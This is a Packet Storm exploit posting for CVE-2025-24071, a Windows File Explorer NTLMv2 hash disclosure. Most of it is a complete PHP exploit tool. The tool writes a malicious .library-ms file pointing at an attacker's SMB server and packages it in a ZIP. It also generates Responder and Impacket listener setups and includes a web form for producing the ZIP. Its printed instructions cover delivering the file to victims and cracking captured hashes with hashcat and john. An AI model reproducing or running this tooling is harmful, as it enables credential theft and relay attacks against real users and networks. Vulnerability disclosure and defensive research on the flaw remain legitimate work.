Microsoft Windows File Explorer NTLM Hash Disclosure

Published: 05 Dec 2025 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Views: 218

Windows File Explorer NTLMv2 hash disclosure via library files from ZIPs enables credential relay.

Code
    =============================================================================================================================================
    | # Title     : Windows File Explorer NTLM v2 Hash Disclosure                                                                               |
    | # Author    : indoushka                                                                                                                    |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                             |
    | # Vendor    : System built-in component. No standalone download available                                                                 |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/197740/ & CVE-2025-24071
    
    [+] Summary :
                Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by exploiting the automatic parsing of .library-ms files from ZIP archives, leading to potential domain compromise through credential relay attacks.
    The vulnerability exists in Windows Explorer's automatic handling of .library-ms files extracted from ZIP archives. When a user extracts a malicious ZIP file, Explorer automatically attempts to connect to SMB shares specified in the .library-ms file, leaking NTLMv2 hashes to attacker-controlled servers without user interaction.
    
    
    [+] POC :
    
    php poc.php
    
    <?php
    
    class WindowsNTLMHashDisclosure {
    
        private $ip;
        private $filename;
        private $output_dir;
        private $keep_files;
    
        public function __construct($ip, $filename = 'malicious', $output_dir = 'output', $keep_files = false) {
            $this->ip = $ip;
            $this->filename = $filename;
            $this->output_dir = rtrim($output_dir, '/');
            $this->keep_files = $keep_files;
        }
    
        public function banner() {
            echo "==================================================\n";
            echo " Windows File Explorer NTLM Hash Disclosure\n";
            echo " CVE-2025-24071 Exploit Tool\n";
            echo " Author: indoushka (PHP Port)\n";
            echo "==================================================\n\n";
        }
    
        public function create_library_ms() {
            $payload = <<<XML
    <?xml version="1.0" encoding="UTF-8"?>
    <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
      <searchConnectorDescriptionList>
        <searchConnectorDescription>
          <simpleLocation>
            <url>\\\\{$this->ip}\\shared</url>
          </simpleLocation>
        </searchConnectorDescription>
      </searchConnectorDescriptionList>
    </libraryDescription>
    XML;
    
            $library_file = $this->output_dir . '/' . $this->filename . '.library-ms';
    
            if (!file_put_contents($library_file, $payload)) {
                throw new Exception("Failed to create .library-ms file");
            }
    
            echo "[+] Created malicious .library-ms file: {$library_file}\n";
            return $library_file;
        }
    
        public function build_zip($library_file) {
            $zip_file = $this->output_dir . '/' . $this->filename . '.zip';
    
            $zip = new ZipArchive();
            if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
                throw new Exception("Cannot create ZIP file: {$zip_file}");
            }
    
            $zip->addFile($library_file, basename($library_file));
            $zip->close();
    
            echo "[+] Created ZIP archive: {$zip_file}\n";
            return $zip_file;
        }
    
        public function exploit() {
            $this->banner();
    
            echo "[*] Target SMB Server: {$this->ip}\n";
            echo "[*] Output Directory: {$this->output_dir}\n";
            echo "[*] Base Filename: {$this->filename}\n\n";
    
            // Create output directory
            if (!is_dir($this->output_dir)) {
                if (!mkdir($this->output_dir, 0755, true)) {
                    throw new Exception("Failed to create output directory: {$this->output_dir}");
                }
            }
    
            // Create malicious .library-ms file
            $library_file = $this->create_library_ms();
    
            // Package into ZIP
            $zip_file = $this->build_zip($library_file);
    
            // Clean up if not keeping files
            if (!$this->keep_files && file_exists($library_file)) {
                unlink($library_file);
                echo "[-] Removed intermediate .library-ms file\n";
            }
    
            $this->display_instructions($zip_file);
    
            return $zip_file;
        }
    
        private function display_instructions($zip_file) {
            echo "\n" . str_repeat("=", 60) . "\n";
            echo " EXPLOITATION INSTRUCTIONS\n";
            echo str_repeat("=", 60) . "\n";
            echo "1. Start SMB listener on {$this->ip}:\n";
            echo "   - Using Responder: responder -I eth0 -wrf\n";
            echo "   - Using Impacket: smbserver.py SHARE /tmp/smb -smb2support\n";
            echo "\n2. Deliver ZIP file to victim:\n";
            echo "   - File: {$zip_file}\n";
            echo "   - Methods: Email, USB, Network share, etc.\n";
            echo "\n3. When victim extracts ZIP, Windows Explorer will:\n";
            echo "   - Automatically parse .library-ms file\n";
            echo "   - Attempt SMB connection to {$this->ip}\n";
            echo "   - Leak NTLMv2 hash to your SMB server\n";
            echo "\n4. Crack the captured hash:\n";
            echo "   - Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\n";
            echo "   - Use john: john --format=netntlmv2 hash.txt\n";
            echo str_repeat("=", 60) . "\n";
        }
    
        public static function is_valid_ip($ip) {
            return filter_var($ip, FILTER_VALIDATE_IP) !== false;
        }
    
        public function get_file_paths() {
            return [
                'library_ms' => $this->output_dir . '/' . $this->filename . '.library-ms',
                'zip' => $this->output_dir . '/' . $this->filename . '.zip'
            ];
        }
    }
    
    class SMBListenerHelper {
    
        public static function generate_responder_config($ip) {
            $config = <<<CONFIG
    ; Responder Configuration for CVE-2025-24071
    ; Save as responder.conf
    
    [Responder Core]
    SQL = On
    SMB = On
    Kerberos = On
    FTP = On
    POP = On
    SMTP = On
    IMAP = On
    HTTP = On
    HTTPS = On
    DNS = On
    LDAP = On
    
    ; Network interface
    Interface = eth0
    
    ; Specific IP to listen on
    BindIP = {$ip}
    
    ; Analysis mode (optional)
    Analyze = On
    CONFIG;
    
            return $config;
        }
    
        public static function generate_smbserver_script() {
            $script = <<<PYTHON
    #!/usr/bin/env python3
    # Impacket SMB Server for CVE-2025-24071
    
    from impacket import smbserver
    from impacket.ntlm import compute_lmhash, compute_nthash
    import argparse
    import threading
    import sys
    
    class CVE202524071Server:
        def __init__(self, listen_address, share_path):
            self.server = smbserver.SimpleSMBServer(listen_address, listen_address, 445)
            self.server.addShare("SHARE", share_path)
    
        def start(self):
            print("[*] Starting SMB server for CVE-2025-24071")
            print("[*] Waiting for NTLM hash leakage...")
            self.server.start()
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument("--ip", required=True, help="IP to listen on")
        parser.add_argument("--share", default="/tmp/smb", help="Share path")
        args = parser.parse_args()
    
        server = CVE202524071Server(args.ip, args.share)
        server.start()
    PYTHON;
    
            return $script;
        }
    }
    
    class HashCrackingHelper {
    
        public static function display_cracking_commands($hash_file = 'captured_hashes.txt') {
            $commands = [
                'hashcat' => "hashcat -m 5600 {$hash_file} /usr/share/wordlists/rockyou.txt",
                'john' => "john --format=netntlmv2 {$hash_file}",
                'online_crack' => "Use online services like crackstation.net or hashes.com"
            ];
    
            echo "\n" . str_repeat("=", 50) . "\n";
            echo " HASH CRACKING COMMANDS\n";
            echo str_repeat("=", 50) . "\n";
    
            foreach ($commands as $tool => $command) {
                echo "{$tool}: {$command}\n";
            }
            echo str_repeat("=", 50) . "\n";
        }
    
        public static function generate_hash_example() {
            $example = <<<HASH
    Example NTLMv2 Hash Format:
    username::domain:challenge:HMAC-MD5:blob
    
    Actual captured hash will look like:
    Administrator
    HASH;
    
            return $example;
        }
    }
    
    // Command line interface
    if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
    
        if ($argc < 2) {
            echo "Windows File Explorer NTLM Hash Disclosure (CVE-2025-24071)\n";
            echo "===========================================================\n";
            echo "Usage: php " . $argv[0] . " <attacker_ip> [options]\n";
            echo "Example: php " . $argv[0] . " 192.168.1.100\n";
            echo "Example: php " . $argv[0] . " 192.168.1.100 -n payroll -o ./malicious_zips --keep\n";
            echo "\nOptions:\n";
            echo "  -n, --name      Base filename (default: malicious)\n";
            echo "  -o, --output    Output directory (default: ./output)\n";
            echo "  -k, --keep      Keep .library-ms file after ZIP creation\n";
            echo "  --smb-help      Show SMB listener setup help\n";
            echo "  --crack-help    Show hash cracking instructions\n";
            exit(1);
        }
    
        $ip = $argv[1];
        $filename = 'malicious';
        $output_dir = 'output';
        $keep_files = false;
    
        // Parse command line options
        for ($i = 2; $i < $argc; $i++) {
            switch ($argv[$i]) {
                case '-n':
                case '--name':
                    $filename = $argv[++$i];
                    break;
                case '-o':
                case '--output':
                    $output_dir = $argv[++$i];
                    break;
                case '-k':
                case '--keep':
                    $keep_files = true;
                    break;
                case '--smb-help':
                    echo SMBListenerHelper::generate_responder_config('192.168.1.100');
                    echo "\n\n";
                    echo SMBListenerHelper::generate_smbserver_script();
                    exit(0);
                case '--crack-help':
                    HashCrackingHelper::display_cracking_commands();
                    echo "\n" . HashCrackingHelper::generate_hash_example() . "\n";
                    exit(0);
            }
        }
    
        try {
            if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {
                echo "[-] Invalid IP address: {$ip}\n";
                exit(1);
            }
    
            $exploit = new WindowsNTLMHashDisclosure($ip, $filename, $output_dir, $keep_files);
            $zip_file = $exploit->exploit();
    
            echo "\n[+] Exploit files created successfully!\n";
            echo "[+] Deliver this file to the victim: {$zip_file}\n";
    
        } catch (Exception $e) {
            echo "[-] Error: " . $e->getMessage() . "\n";
            exit(1);
        }
    }
    
    // Web interface for the exploit
    if (isset($_GET['web']) && $_GET['web'] === 'true') {
        ?>
        <!DOCTYPE html>
        <html>
        <head>
            <title>CVE-2025-24071 - NTLM Hash Disclosure</title>
            <style>
                body { font-family: Arial, sans-serif; margin: 40px; background: #f0f0f0; }
                .container { max-width: 900px; margin: 0 auto; background: white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
                h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f; padding-bottom: 10px; }
                .form-group { margin: 20px 0; }
                label { display: block; margin-bottom: 5px; font-weight: bold; color: #333; }
                input[type="text"] { padding: 10px; width: 300px; border: 1px solid #ddd; border-radius: 4px; }
                button { background: #d32f2f; color: white; padding: 12px 25px; border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }
                button:hover { background: #b71c1c; }
                .output { background: #f8f8f8; padding: 15px; border-radius: 4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }
                .success { color: #388e3c; font-weight: bold; }
                .error { color: #d32f2f; font-weight: bold; }
                .info-box { background: #e3f2fd; padding: 15px; border-radius: 4px; margin: 15px 0; }
            </style>
        </head>
        <body>
            <div class="container">
                <h1>CVE-2025-24071 - Windows NTLM Hash Disclosure</h1>
    
                <?php
                if ($_POST['generate'] ?? false) {
                    $ip = $_POST['ip'] ?? '';
                    $filename = $_POST['filename'] ?? 'malicious';
                    $keep_files = isset($_POST['keep_files']);
    
                    if (!empty($ip)) {
                        echo '<div class="output">';
                        try {
                            $exploit = new WindowsNTLMHashDisclosure($ip, $filename, 'web_output', $keep_files);
                            $zip_file = $exploit->exploit();
    
                            $file_paths = $exploit->get_file_paths();
                            if (file_exists($file_paths['zip'])) {
                                $file_url = 'web_output/' . basename($file_paths['zip']);
                                echo '<p class="success">ZIP file generated successfully!</p>';
                                echo '<p><a href="' . $file_url . '" download>Download Malicious ZIP File</a></p>';
                            }
                        } catch (Exception $e) {
                            echo '<p class="error">Error: ' . $e->getMessage() . '</p>';
                        }
                        echo '</div>';
                    }
                }
                ?>
    
                <form method="post">
                    <div class="form-group">
                        <label for="ip">Your SMB Server IP:</label>
                        <input type="text" id="ip" name="ip" placeholder="192.168.1.100" required>
                    </div>
    
                    <div class="form-group">
                        <label for="filename">ZIP Filename:</label>
                        <input type="text" id="filename" name="filename" value="malicious">
                    </div>
    
                    <div class="form-group">
                        <label>
                            <input type="checkbox" name="keep_files" value="1">
                            Keep .library-ms file (for analysis)
                        </label>
                    </div>
    
                    <button type="submit" name="generate">Generate Malicious ZIP</button>
                </form>
    
                <div class="info-box">
                    <h3>About CVE-2025-24071:</h3>
                    <p>This vulnerability affects Windows File Explorer in
    Windows 10/11. When a user extracts a ZIP file containing a malicious
    .library-ms file, Windows Explorer automatically attempts to connect to an
    SMB server specified in the file, leaking the user's NTLMv2 hash.</p>
    
                    <h3>Exploitation Steps:</h3>
                    <ol>
                        <li>Set up SMB listener on your server</li>
                        <li>Generate malicious ZIP using this tool</li>
                        <li>Deliver ZIP to target user</li>
                        <li>Capture NTLM hash when they extract the file</li>
                        <li>Crack the hash to obtain credentials</li>
                    </ol>
    
                    <p><strong>Note:</strong> This tool is for educational and
    authorized testing purposes only.</p>
                </div>
            </div>
        </body>
        </html>
        <?php
        exit;
    }
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Current version: 05 Dec 2025 00:00
Vulners AI Score: 6.9 (Medium risk)
CVSS 3.1: 6.5
EPSS: 0.74072